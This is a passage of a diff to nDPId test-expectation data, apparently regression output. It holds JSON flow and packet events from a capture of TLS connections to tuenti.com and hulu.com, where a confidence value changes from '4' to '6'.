01167{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":365,"source":"sites.pcapng","alias":"nDPId-test","flow_id":20,"flow_packet_id":3,"flow_last_seen":1646482785351,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":583,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":583,"pkt_l4_len":549,"thread_ts_msec":1646482785351,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAI5c2VAAEAG+lLAqAGAX4OpW8gwAbszoGaC9Hw52YAYAfYZoQAAAQEICsIm3l8i\/WCZFgMBAgABAAH8AwNK0euZMFtaCNBtu+eL8QS+C1QwW1wzikaweB9ZeLN7jCCkdWD5KYTe5rYj3sVQQUUDDmKS7Ul8Bkz8dJPsZBeSHgAiEwETAxMCwCvAL8ypzKjALMAwwArACcATwBQAnACdAC8ANQEAAZEAAAAPAA0AAAp0dWVudGkuY29tABcAAP8BAAEAAAoADgAMAB0AFwAYABkBAAEBAAsAAgEAACMAAAAQAA4ADAJoMghodHRwLzEuMQAFAAUBAAAAAAAiAAoACAQDBQMGAwIDADMAawBpAB0AIJK5tprzoOfSjZ23KXMf08y5udMKZfRYOXHDalLyYQBZABcAQQRLZU+TiBidby\/7mJhjeaCEAZfIl\/ESg4w9XgdOmdSs6KJ9\/6C1zE6e09432pgZPLx5qZNVUeHl8Lum72bGeXBPACsABQQDBAMDAA0AGAAWBAMFAwYDCAQIBQgGBAEFAQYBAgMCAQAtAAIBAQAcAAJAAQAVAIwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="} -00875{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":365,"source":"sites.pcapng","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1646482785304,"flow_last_seen":1646482785351,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":172,"midstream":0,"thread_ts_msec":1646482785351,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"95.131.169.91","src_port":51248,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"tuenti.com","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} -00931{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":366,"source":"sites.pcapng","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1646482785304,"flow_last_seen":1646482785395,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1965,"flow_avg_l4_payload_len":491,"midstream":0,"thread_ts_msec":1646482785395,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"95.131.169.91","src_port":51248,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"tuenti.com","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"61be9ce3d068c08ff99a857f62352f9d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} -01207{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":368,"source":"sites.pcapng","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1646482785304,"flow_last_seen":1646482785395,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":3831,"flow_avg_l4_payload_len":638,"midstream":0,"thread_ts_msec":1646482785395,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"95.131.169.91","src_port":51248,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Tuenti","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1.2","client_requested_server_name":"tuenti.com","server_names":"*.tuenti.com,tuenti.com","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"61be9ce3d068c08ff99a857f62352f9d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=DigiCert Inc, CN=DigiCert TLS RSA SHA256 2020 CA1","subjectDN":"C=ES, L=Madrid, O=Tuenti Technologies S.L., CN=*.tuenti.com","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2","fingerprint":"89:B8:FA:C7:22:04:D2:BE:C5:6E:59:10:31:67:42:B1:3F:6D:F8:3B"}} +00875{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":365,"source":"sites.pcapng","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1646482785304,"flow_last_seen":1646482785351,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":172,"midstream":0,"thread_ts_msec":1646482785351,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"95.131.169.91","src_port":51248,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"tuenti.com","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} +00931{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":366,"source":"sites.pcapng","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1646482785304,"flow_last_seen":1646482785395,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1965,"flow_avg_l4_payload_len":491,"midstream":0,"thread_ts_msec":1646482785395,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"95.131.169.91","src_port":51248,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"tuenti.com","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"61be9ce3d068c08ff99a857f62352f9d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} +01207{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":368,"source":"sites.pcapng","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1646482785304,"flow_last_seen":1646482785395,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":3831,"flow_avg_l4_payload_len":638,"midstream":0,"thread_ts_msec":1646482785395,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"95.131.169.91","src_port":51248,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Tuenti","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1.2","client_requested_server_name":"tuenti.com","server_names":"*.tuenti.com,tuenti.com","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"61be9ce3d068c08ff99a857f62352f9d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=DigiCert Inc, CN=DigiCert TLS RSA SHA256 2020 CA1","subjectDN":"C=ES, L=Madrid, O=Tuenti Technologies S.L., CN=*.tuenti.com","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2","fingerprint":"89:B8:FA:C7:22:04:D2:BE:C5:6E:59:10:31:67:42:B1:3F:6D:F8:3B"}} 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":371,"source":"sites.pcapng","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1646482786097,"flow_last_seen":1646482786097,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1646482786097,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"95.131.170.91","src_port":39302,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":371,"source":"sites.pcapng","alias":"nDPId-test","flow_id":21,"flow_packet_id":1,"flow_last_seen":1646482786097,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1646482786097,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAA8MYNAAEAGPTLAqAGAX4OqW5mGAbs4G85LAAAAAKAC+vAJ+AAAAgQFtAQCCApUK4E8AAAAAAEDAwc="} 00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":372,"source":"sites.pcapng","alias":"nDPId-test","flow_id":21,"flow_packet_id":2,"flow_last_seen":1646482786139,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1646482786139,"pkt":"PKn0qB\/spJGxgjQ5CABFAAA8AABAADEGfbVfg6pbwKgBgAG7mYaAJv+vOBvOTKASOJA3NAAAAgQFtAQCCAojEPIqVCuBPAEDAwk="} 01170{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":373,"source":"sites.pcapng","alias":"nDPId-test","flow_id":21,"flow_packet_id":3,"flow_last_seen":1646482786140,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":583,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":583,"pkt_l4_len":549,"thread_ts_msec":1646482786140,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAI5MYVAAEAGOzPAqAGAX4OqW5mGAbs4G85MgCb\/sIAYAfY7ugAAAQEIClQrgWcjEPIqFgMBAgABAAH8AwPCuINo9aszS1NOKEJoT\/qcXc1z2+SkMYjVWEN9Dzm1uCAc1Fe\/tF+S3TB+puhQn5k1kl\/SrZE1Zu7DG17b6iPYkAAiEwETAxMCwCvAL8ypzKjALMAwwArACcATwBQAnACdAC8ANQEAAZEAAAAWABQAABFzdGF0aWMudHVlbnRpLmNvbQAXAAD\/AQABAAAKAA4ADAAdABcAGAAZAQABAQALAAIBAAAjAAAAEAAOAAwCaDIIaHR0cC8xLjEABQAFAQAAAAAAIgAKAAgEAwUDBgMCAwAzAGsAaQAdACAO0kbEPJvFV01Owk3nxVpBPAsVRMhGqyVHONxZeCXXCAAXAEEEdYt+qtkVgPe4ucZXkNkiZFAQTN50kMr6BFmQ8vGiT4E\/aWy5wxXrEUez6C+lutJauRk\/zdA9y71YXWyeYxHbNwArAAUEAwQDAwANABgAFgQDBQMGAwgECAUIBgQBBQEGAQIDAgEALQACAQEAHAACQAEAFQCFAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="} -00896{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":373,"source":"sites.pcapng","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1646482786097,"flow_last_seen":1646482786140,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":172,"midstream":0,"thread_ts_msec":1646482786140,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"95.131.170.91","src_port":39302,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Tuenti","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1.2","client_requested_server_name":"static.tuenti.com","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} -00952{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":374,"source":"sites.pcapng","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1646482786097,"flow_last_seen":1646482786188,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1965,"flow_avg_l4_payload_len":491,"midstream":0,"thread_ts_msec":1646482786188,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"95.131.170.91","src_port":39302,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Tuenti","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1.2","client_requested_server_name":"static.tuenti.com","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"61be9ce3d068c08ff99a857f62352f9d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} -01214{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":376,"source":"sites.pcapng","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1646482786097,"flow_last_seen":1646482786188,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":3831,"flow_avg_l4_payload_len":638,"midstream":0,"thread_ts_msec":1646482786188,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"95.131.170.91","src_port":39302,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Tuenti","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1.2","client_requested_server_name":"static.tuenti.com","server_names":"*.tuenti.com,tuenti.com","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"61be9ce3d068c08ff99a857f62352f9d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=DigiCert Inc, CN=DigiCert TLS RSA SHA256 2020 CA1","subjectDN":"C=ES, L=Madrid, O=Tuenti Technologies S.L., CN=*.tuenti.com","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2","fingerprint":"89:B8:FA:C7:22:04:D2:BE:C5:6E:59:10:31:67:42:B1:3F:6D:F8:3B"}} +00896{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":373,"source":"sites.pcapng","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1646482786097,"flow_last_seen":1646482786140,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":172,"midstream":0,"thread_ts_msec":1646482786140,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"95.131.170.91","src_port":39302,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Tuenti","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1.2","client_requested_server_name":"static.tuenti.com","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} +00952{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":374,"source":"sites.pcapng","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1646482786097,"flow_last_seen":1646482786188,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1965,"flow_avg_l4_payload_len":491,"midstream":0,"thread_ts_msec":1646482786188,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"95.131.170.91","src_port":39302,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Tuenti","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1.2","client_requested_server_name":"static.tuenti.com","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"61be9ce3d068c08ff99a857f62352f9d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} +01214{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":376,"source":"sites.pcapng","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1646482786097,"flow_last_seen":1646482786188,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":3831,"flow_avg_l4_payload_len":638,"midstream":0,"thread_ts_msec":1646482786188,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"95.131.170.91","src_port":39302,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Tuenti","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1.2","client_requested_server_name":"static.tuenti.com","server_names":"*.tuenti.com,tuenti.com","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"61be9ce3d068c08ff99a857f62352f9d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=DigiCert Inc, CN=DigiCert TLS RSA SHA256 2020 CA1","subjectDN":"C=ES, L=Madrid, O=Tuenti Technologies S.L., CN=*.tuenti.com","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2","fingerprint":"89:B8:FA:C7:22:04:D2:BE:C5:6E:59:10:31:67:42:B1:3F:6D:F8:3B"}} 00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":379,"source":"sites.pcapng","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1646482791144,"flow_last_seen":1646482791144,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1646482791144,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"95.101.195.214","src_port":51432,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":379,"source":"sites.pcapng","alias":"nDPId-test","flow_id":22,"flow_packet_id":1,"flow_last_seen":1646482791144,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1646482791144,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAA8FF5AAEAGQPrAqAGAX2XD1sjoAbs9AWSXAAAAAKAC+vBfJgAAAgQFtAQCCAoz72hZAAAAAAEDAwc="} 00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":380,"source":"sites.pcapng","alias":"nDPId-test","flow_id":22,"flow_packet_id":2,"flow_last_seen":1646482791167,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1646482791167,"pkt":"PKn0qB\/spJGxgjQ5CABFAAA8AABAADMGYlhfZcPWwKgBgAG7yOhRyYQJPQFkmKAS\/ohadwAAAgQFtAQCCAoA0SpiM+9oWQEDAwc="} 01165{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":381,"source":"sites.pcapng","alias":"nDPId-test","flow_id":22,"flow_packet_id":3,"flow_last_seen":1646482791170,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":583,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":583,"pkt_l4_len":549,"thread_ts_msec":1646482791170,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAI5FGBAAEAGPvvAqAGAX2XD1sjoAbs9AWSYUcmECoAYAfYkYQAAAQEICjPvaHMA0SpiFgMBAgABAAH8AwPkjLny33P+mExr32cMRl62\/8RJSZlKid1V05U+ySIWLCA+yoN1VMfFXakU81pmrArAv4PMFa74gV6zhhtZIkRahgAiEwETAxMCwCvAL8ypzKjALMAwwArACcATwBQAnACdAC8ANQEAAZEAAAANAAsAAAhodWx1LmNvbQAXAAD\/AQABAAAKAA4ADAAdABcAGAAZAQABAQALAAIBAAAjAAAAEAAOAAwCaDIIaHR0cC8xLjEABQAFAQAAAAAAIgAKAAgEAwUDBgMCAwAzAGsAaQAdACATY1QXYS0qh7KvKliQF74PNyaFCqlZEZicpu9ccKADKQAXAEEEtcC0kqJMuUk4fNE8PcFvshva3wSMZbKQk5Gr6YxJX1t14RCVX0X4nJLqvHYB8ofAk7LBbtBWK6qUGB5XQIzcOQArAAUEAwQDAwANABgAFgQDBQMGAwgECAUIBgQBBQEGAQIDAgEALQACAQEAHAACQAEAFQCOAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="} -00884{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":381,"source":"sites.pcapng","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1646482791144,"flow_last_seen":1646482791170,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":172,"midstream":0,"thread_ts_msec":1646482791170,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"95.101.195.214","src_port":51432,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Hulu","breed":"Fun","category":"Streaming"},"tls": {"version":"TLSv1.2","client_requested_server_name":"hulu.com","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} -00925{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":382,"source":"sites.pcapng","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1646482791144,"flow_last_seen":1646482791191,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1965,"flow_avg_l4_payload_len":491,"midstream":0,"thread_ts_msec":1646482791191,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"95.101.195.214","src_port":51432,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Hulu","breed":"Fun","category":"Streaming"},"tls": {"version":"TLSv1.3","client_requested_server_name":"hulu.com","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"15af977ce25de452b96affa2addb1036","unsafe_cipher":0,"cipher":"TLS_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} +00884{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":381,"source":"sites.pcapng","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1646482791144,"flow_last_seen":1646482791170,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":172,"midstream":0,"thread_ts_msec":1646482791170,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"95.101.195.214","src_port":51432,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Hulu","breed":"Fun","category":"Streaming"},"tls": {"version":"TLSv1.2","client_requested_server_name":"hulu.com","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} +00925{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":382,"source":"sites.pcapng","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1646482791144,"flow_last_seen":1646482791191,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1965,"flow_avg_l4_payload_len":491,"midstream":0,"thread_ts_msec":1646482791191,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"95.101.195.214","src_port":51432,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Hulu","breed":"Fun","category":"Streaming"},"tls": {"version":"TLSv1.3","client_requested_server_name":"hulu.com","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"15af977ce25de452b96affa2addb1036","unsafe_cipher":0,"cipher":"TLS_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} 00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":383,"source":"sites.pcapng","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1646482801387,"flow_last_seen":1646482801387,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1646482801387,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"34.96.123.111","src_port":44954,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":383,"source":"sites.pcapng","alias":"nDPId-test","flow_id":23,"flow_packet_id":1,"flow_last_seen":1646482801387,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1646482801387,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAA8u7RAAEAGHxDAqAGAImB7b6+aAFDTrORQAAAAAKAC+vAeUwAAAgQFtAQCCAqmtsAlAAAAAAEDAwc="} 00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":384,"source":"sites.pcapng","alias":"nDPId-test","flow_id":23,"flow_packet_id":2,"flow_last_seen":1646482801394,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1646482801394,"pkt":"PKn0qB\/spJGxgjQ5CABFgAA8tJQAAHkGLLAiYHtvwKgBgABQr5rfpgWE06zkUaAS\/\/9QBgAAAgQFlgQCCArcngeAprbAJQEDAwg="} @@ -156,8 +156,8 @@ 00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":385,"source":"sites.pcapng","alias":"nDPId-test","flow_id":24,"flow_packet_id":1,"flow_last_seen":1646482802720,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1646482802720,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAA8g6pAAEAGYJjAqAGAI8lwiLgSAbvaEoGzAAAAAKAC+vAuRQAAAgQFtAQCCArAZPJXAAAAAAEDAwc="} 